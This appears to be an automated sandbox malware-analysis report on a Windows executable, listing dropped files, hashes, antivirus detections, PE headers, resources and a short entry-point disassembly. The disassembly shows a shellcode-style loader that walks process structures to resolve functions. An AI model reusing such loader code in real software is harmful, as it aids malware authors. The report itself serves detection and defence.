        C:\Users\user\AppData\Local\Temp\E2EECore.2.7.2.dllLlzSY5b5yY.exeGet hashmaliciousUnknownBrowse
          LlzSY5b5yY.exeGet hashmaliciousUnknownBrowse
            dNHmdKBL0t.exeGet hashmaliciousUnknownBrowse
              dNHmdKBL0t.exeGet hashmaliciousUnknownBrowse
                dNHmdKBL0t.exeGet hashmaliciousUnknownBrowse
                  evilpassword.exeGet hashmaliciousUnknownBrowse
                    gm_pin.exeGet hashmaliciousUnknownBrowse
                      GM_anti-theft_password.exeGet hashmaliciousUnknownBrowse
                        #U8d22#U795e#U52a9#U624b2.4.exeGet hashmaliciousUnknownBrowse
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19456
                          Entropy (8bit):6.591085255544899
                          Encrypted:false
                          SSDEEP:384:1FiSMXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:TsQGPL4vzZq2o9W7GsxBbPr
                          MD5:CE3711B837D78ACBEBC27E24F811AB3B
                          SHA1:D66AD1B81D8E20C48F2762059279DEAD23035166
                          SHA-256:700089133E411F19821C21FEB52AAC39488C0A774D54965336001476C6E6041C
                          SHA-512:EF8B2AA9B0946D1F5F38C53755BD7918143CD7D3FA1839CB962CAE01EE3E6FA43B210252F3171174FAAB4670E9C517F34551E3FACED3F4DD813E11B722A53254
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:modified
                          Size (bytes):2389504
                          Entropy (8bit):6.731349265934764
                          Encrypted:false
                          SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                          MD5:A15C53B12DBF4F3989AFFED5EE0CD72C
                          SHA1:7951FE0B87D4C4A7F8CEC244F6E51711A38EB0F9
                          SHA-256:764816A579138E72D0C5E9295C8B66EEEF32DF03C3FDFE7D7B24240427DA37A8
                          SHA-512:E7AE0823F62ABFBC87072CD1F264F20ED0137CE30918F1CD109C3EAB396693F3DA3EE8FE967DFC49E990B0C9E10BC4B49A6BF5CBD6255F59C7CD5382EA19EF09
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):31744
                          Entropy (8bit):6.366106543944447
                          Encrypted:false
                          SSDEEP:768:uWQ3655Kv1X/qY1MSdMuQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdMVGCq2iW7z
                          MD5:D8D240E0A2F5E5AA13F70F3F76CDF39F
                          SHA1:8B4130A9ABCC33B59F436F4632F51588EA8741AF
                          SHA-256:11797648A3764375B48527894C6DBE863886C978793A5F3F8A854A242F73967C
                          SHA-512:2EDA42A0E4EB53B82AD535B440F57027CE076EB72522151BF7BEAF61483F77BBDB209E8F2A44B2AD16AACD7EF83DB75FCE36A627963A7EDDCA756DBCC62B14ED
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.9749434271024817
                          Encrypted:false
                          SSDEEP:96:U7FxIGznNYsghnK7afzQXIDcQgc6n2cEzcw3Ig+HbHg/5ksS/YyNl1zWDUTuFqLP:mTvznNYS0+j2Z2jE/JXzuiFdZ24IO8d
                          MD5:30DCB615D105FDDD158B906E178EB296
                          SHA1:F04CA4C57116595E3CC2C4227EC79D4F5D4B15DD
                          SHA-256:4DF8682F437014FE528AEC5909CA71AD9F481F09B7D43838A78FD22A647D7AB1
                          SHA-512:55D4549BA28EBB44C6CA52F4A1B39823FCA7D9882923A9F035B99C4AED742B539C2756E49AB28D7C1D5330B80762892480E01C759F7EDF9610B6638486F8D265
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.3.1.3.4.8.3.3.3.9.6.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.3.1.3.4.8.8.9.6.4.6.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.4.8.f.b.8.5.-.7.e.3.0.-.4.9.8.4.-.b.3.a.2.-.a.1.5.7.f.2.5.6.0.2.2.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.1.1.0.9.f.b.-.1.b.0.d.-.4.6.e.5.-.9.d.5.3.-.d.9.b.3.b.2.b.5.1.9.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.F.A.G.W.Z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.c.-.0.0.0.1.-.0.0.1.4.-.9.d.6.2.-.f.a.4.b.1.3.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.9.2.2.0.7.5.9.e.9.b.8.e.1.1.b.8.9.f.a.e.2.e.0.2.4.b.3.9.6.e.e.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.X.F.A.G.W.Z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 21:49:08 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):162206
                          Entropy (8bit):1.8387660480578405
                          Encrypted:false
                          SSDEEP:768:Ax2h9nslsgI4aC/q76EXws40SS/QKGgr:Gf7vaCo6sHZpr
                          MD5:5888818B51192B6E4206A8389E64B6C8
                          SHA1:4E5637D784F7148DA7943AE93412B7EBF742B32B
                          SHA-256:4E3F31EB9EA43E91C47A50F79AC08C6A85A45CB41D07824ABEF61137D22513AD
                          SHA-512:AA35112BFE6650617FC64C3168C4401F682C588804ECBB7AA0E6A43763FCE14064536334A6001A8E59BC40F026E38BC9633908B76BBCC81DF8E8F3942CCA45C3
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... ........v.f............t.......................<...T ......d....P..........`.......8...........T............=...;........... ..........|"..............................................................................eJ.......#......GenuineIntel............T............v.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8272
                          Entropy (8bit):3.6999061397655053
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJRo64VQe6Y8H65kGgmfGmApDT89bxEsf0pvQbm:R6lXJe6E6YM65VgmfGmJx3fQJ
                          MD5:97801AEF98CBF4FDCE62A4E94142D717
                          SHA1:F8A42B215E2A4BFEFC2FE6D67EE29562A0E97DEF
                          SHA-256:FA73F89AAA281D0510690D093171A1D0CFE659265D19A499DA4456EE9B61C9C9
                          SHA-512:13CF2C73EF0A3D8E341BE4EED5243925D992C1A0AF4B61CF80D549081BD4E23A5090739D52747E51FB0B46911C9BD98C526A4DD3286444F72B7FCF2F854A3D25
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.5.6.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4551
                          Entropy (8bit):4.462838691168284
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsuJg77aI9v1yWpW8VYcYm8M4J8MF3+q8uX3EngoTd:uIjfkI7xV7VQJbP0ngoTd
                          MD5:FE5B9DC59E474CB047FC237905FD0C4F
                          SHA1:BD216F46544C313CEC236FE2B592EA5B85441B25
                          SHA-256:E299DA9F4F383B7F22A15E293121461DA5D0B74A09F107E927FBD863C51D3A35
                          SHA-512:0C191E272592720E6CE1B46C5C998F7A73D287119245C4CB38D758E7CB4B7AF8F7D4CE33A23F1302625E5866BEF3CA5DA4D77FD58368538D298022759E240123
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\Desktop\8VB4lVuZk3.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):8824320
                          Entropy (8bit):6.798757148754891
                          Encrypted:false
                          SSDEEP:98304:z0PpiCcXz5iqFaFxZkyE2kCeQ+LDSBRAN9ijNnQobT9wdxd+tNrspBAUZLh7ZV/T:QyDBaFxZNb+LwRAN9w1X9wdxrpV9/J
                          MD5:8B6C94BBDBFB213E94A5DCB4FAC28CE3
                          SHA1:B56102CA4F03556F387F8B30E2B404EFABE0CB65
                          SHA-256:982A177924762F270B36FE34C7D6847392B48AE53151DC2011078DCEEF487A53
                          SHA-512:9D6D63B5D8CF7A978D7E91126D7A343C2F7ACD00022DA9D692F63E50835FDD84A59A93328564F10622F2B1F6ADFD7FEBDD98B8DDB294D0754ED45CC9C165D25A
                          Malicious:true
                          Joe Sandbox View:
                          • Filename: LlzSY5b5yY.exe, Detection: malicious, Browse
                          • Filename: LlzSY5b5yY.exe, Detection: malicious, Browse
                          • Filename: dNHmdKBL0t.exe, Detection: malicious, Browse
                          • Filename: dNHmdKBL0t.exe, Detection: malicious, Browse
                          • Filename: dNHmdKBL0t.exe, Detection: malicious, Browse
                          • Filename: evilpassword.exe, Detection: malicious, Browse
                          • Filename: gm_pin.exe, Detection: malicious, Browse
                          • Filename: GM_anti-theft_password.exe, Detection: malicious, Browse
                          • Filename: #U8d22#U795e#U52a9#U624b2.4.exe, Detection: malicious, Browse
                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j,..B...B...B..s....B..Z....B..r....B.......B..Y....B..Y....B..Y....B..s...B...C...B.".....B.".....B.".....B.".....B..Y....B......B.".....B.Rich..B.................PE..L...l .^...........!......U...6......F.......U...........................................@..........................7|.......|.,........8...................0...U...U.....................$.v......v.@.............U..............................text...K.U.......U................. ..`.rdata..b;'...U..<'...U.............@..@.data.........|..L....|.............@....tls................................@....rsrc....8.......:..................@..@.reloc...U...0...V...P..............@..B........................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\8VB4lVuZk3.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):15872
                          Entropy (8bit):7.031113762428177
                          Encrypted:false
                          SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                          MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                          SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                          SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                          SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465999491658245
                          Encrypted:false
                          SSDEEP:6144:7IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN3dwBCswSbn:cXD94+WlLZMM6YFHF+n
                          MD5:55167F82A7EC0834E8517098699C02B2
                          SHA1:14E0F105A0ECBF76C57AFB7AE9ABE71F5C830061
                          SHA-256:EB4DCBDAEBD5BF9E9F25B194C906CD29D0E4980FF8C01EAB3C685309C6C13B67
                          SHA-512:5E750562218CA12875135A5F8BC1243640203C9797F8BA3EAF8C595B19C54F29E1EB8C2F07D0BC7D2EDCD2F322E8B248CC208C4E5B825F06EEC6CA093317D202
                          Malicious:false
                          Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.T.L................................................................................................................................................................................................................................................................................................................................................c..x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.762726805131574
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:8VB4lVuZk3.exe
                          File size:4'354'058 bytes
                          MD5:51309d30f3fb3295fea0b6d3084c4d26
                          SHA1:86601e2b6b32ee19c3072221c75ac009165226b7
                          SHA256:bf6ee92cf97d4193943cd99de27b17c4dbd27885cc0a3152b32d2cd97cffb873
                          SHA512:73522e0d402ebd24813c8a9c924946385f8169a8554adda3941eade92fae4c85ab875453275989b88de7d3d9da4a715014a3ce79ee05898e6392ecc216ac9a60
                          SSDEEP:49152:XJu1FGR8ETrtVEgHztu+thX44ifGJtSqeQLgza6BDm5TN+IMUu9+d1cL+0:ZuTGR8cVzArOSqeDalc6dc
                          TLSH:D0160141B68344F2E824293005F39B3AEF7196975B21C6876395DE2C3EB2351F9372E9
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............E...E...E...E...E...E...EJ..E...E...E...E...E...E...E...E...E...E...E...E...E...E!..E...E!..E...E...E...E...E...E6..E...
                          Icon Hash:0e061b160643cbcb
                          Entrypoint:0x856000
                          Entrypoint Section:ub
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:
                          Time Stamp:0x6486E31D [Mon Jun 12 09:19:25 2023 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:7e5055e656d0de769c5445ff3953d089
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 0000016Ch
                          xor eax, eax
                          push ebx
                          push esi
                          push edi
                          mov dword ptr [ebp-24h], eax
                          mov dword ptr [ebp-10h], eax
                          mov dword ptr [ebp-14h], eax
                          mov dword ptr [ebp-08h], eax
                          mov dword ptr [ebp-0Ch], eax
                          mov dword ptr [ebp-20h], eax
                          mov dword ptr [ebp-18h], eax
                          mov dword ptr [ebp-48h], 47414658h
                          mov dword ptr [ebp-44h], 652E5A57h
                          mov dword ptr [ebp-40h], 00006578h
                          mov dword ptr [ebp-3Ch], 00000000h
                          call 00007F2584E502C5h
                          pop eax
                          add eax, 00000225h
                          mov dword ptr [ebp-04h], eax
                          mov eax, dword ptr fs:[00000030h]
                          mov dword ptr [ebp-28h], eax
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax], E904C483h
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax+04h], FFC489DCh
                          mov eax, dword ptr [ebp-28h]
                          mov eax, dword ptr [eax+0Ch]
                          mov eax, dword ptr [eax+1Ch]
                          mov eax, dword ptr [eax]
                          mov eax, dword ptr [eax+08h]
                          mov ecx, dword ptr [eax+3Ch]
                          mov ecx, dword ptr [ecx+eax+78h]
                          add ecx, eax
                          mov edi, dword ptr [ecx+1Ch]
                          mov ebx, dword ptr [ecx+20h]
                          mov esi, dword ptr [ecx+24h]
                          mov ecx, dword ptr [ecx+18h]
                          add esi, eax
                          add edi, eax
                          add ebx, eax
                          xor edx, edx
                          mov dword ptr [ebp-30h], esi
                          mov dword ptr [ebp-1Ch], edx
                          mov dword ptr [ebp-34h], ecx
                          cmp edx, dword ptr [ebp-34h]
                          jnc 00007F2584E5040Eh
                          movzx ecx, word ptr [esi+edx*2]
                          mov edx, dword ptr [ebx+edx*4]
                          mov esi, dword ptr [edi+ecx*4]
                          add edx, eax
                          mov ecx, dword ptr [edx]
                          add esi, eax
                          cmp ecx, 4D746547h
                          jne 00007F2584E50314h
                          cmp dword ptr [edx+04h], 6C75646Fh
                          jne 00007F2584E5030Bh
                          Programming Language:
                          • [C++] VS98 (6.0) SP6 build 8804
                          • [ C ] VS98 (6.0) SP6 build 8804
                          • [C++] VS98 (6.0) build 8168
                          • [ C ] VS98 (6.0) build 8168
                          • [EXP] VC++ 6.0 SP5 build 8804
                          • [LNK] VC++ 6.0 SP5 build 8804
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0xe66500x180.rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe41b80x104.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1730000x2e246c.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xc40000x730.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xc24550xc300079bd633a79fb5f039c4e84cafadc1d75False0.49658954326923077data6.540632015181998IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0xc40000x227d00x23000b69d5a4a746a98d1b5331ec1a596b6a2False0.3810407366071429data5.3119644973523465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xe70000x8b7780x58000131c4b1609393abf97e6ce07255c7f51False0.3206731622869318data6.202879261178366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x1730000x2e246c0x2e3000ff82455577828a8fb15be6e83376e91bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          ub0x4560000x50000x5000b4fcd596df60986058b89a35231bcb2aFalse0.642431640625data6.037759798580667IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          DLL0x173c600x2d91aedataChineseChina1.0003108978271484
                          TEXTINCLUDE0x44ce100xbASCII text, with no line terminatorsChineseChina1.7272727272727273
                          TEXTINCLUDE0x44ce1c0x16dataChineseChina1.3636363636363635
                          TEXTINCLUDE0x44ce340x151C source, ASCII text, with CRLF line terminatorsChineseChina0.6201780415430267
                          RT_CURSOR0x44cf880x134dataChineseChina0.5811688311688312
                          RT_CURSOR0x44d0bc0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                          RT_CURSOR0x44d1f00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                          RT_CURSOR0x44d3240xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                          RT_BITMAP0x44d3d80x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.3598901098901099
                          RT_BITMAP0x44d5440x248Device independent bitmap graphic, 64 x 15 x 4, image size 480ChineseChina0.3407534246575342
                          RT_BITMAP0x44d78c0x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.4444444444444444
                          RT_BITMAP0x44d8d00x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.26453488372093026
                          RT_BITMAP0x44da280x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2616279069767442
                          RT_BITMAP0x44db800x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2441860465116279
                          RT_BITMAP0x44dcd80x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.24709302325581395
                          RT_BITMAP0x44de300x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2238372093023256
                          RT_BITMAP0x44df880x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.19476744186046513
                          RT_BITMAP0x44e0e00x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.20930232558139536
                          RT_BITMAP0x44e2380x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.18895348837209303
                          RT_BITMAP0x44e3900x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404ChineseChina0.34615384615384615
                          RT_BITMAP0x44e9740xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                          RT_BITMAP0x44ea2c0x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.28296703296703296
                          RT_BITMAP0x44eb980x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                          RT_ICON0x44ecdc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.26344086021505375
                          RT_ICON0x44efc40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.41216216216216217
                          RT_ICON0x44f0ec0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.6231695795937647
                          RT_MENU0x4533140xcdataChineseChina1.5
                          RT_MENU0x4533200x284dataChineseChina0.5
                          RT_DIALOG0x4535a40x98dataChineseChina0.7171052631578947
                          RT_DIALOG0x45363c0x17adataChineseChina0.5185185185185185
                          RT_DIALOG0x4537b80xfadataChineseChina0.696
                          RT_DIALOG0x4538b40xeadataChineseChina0.6239316239316239
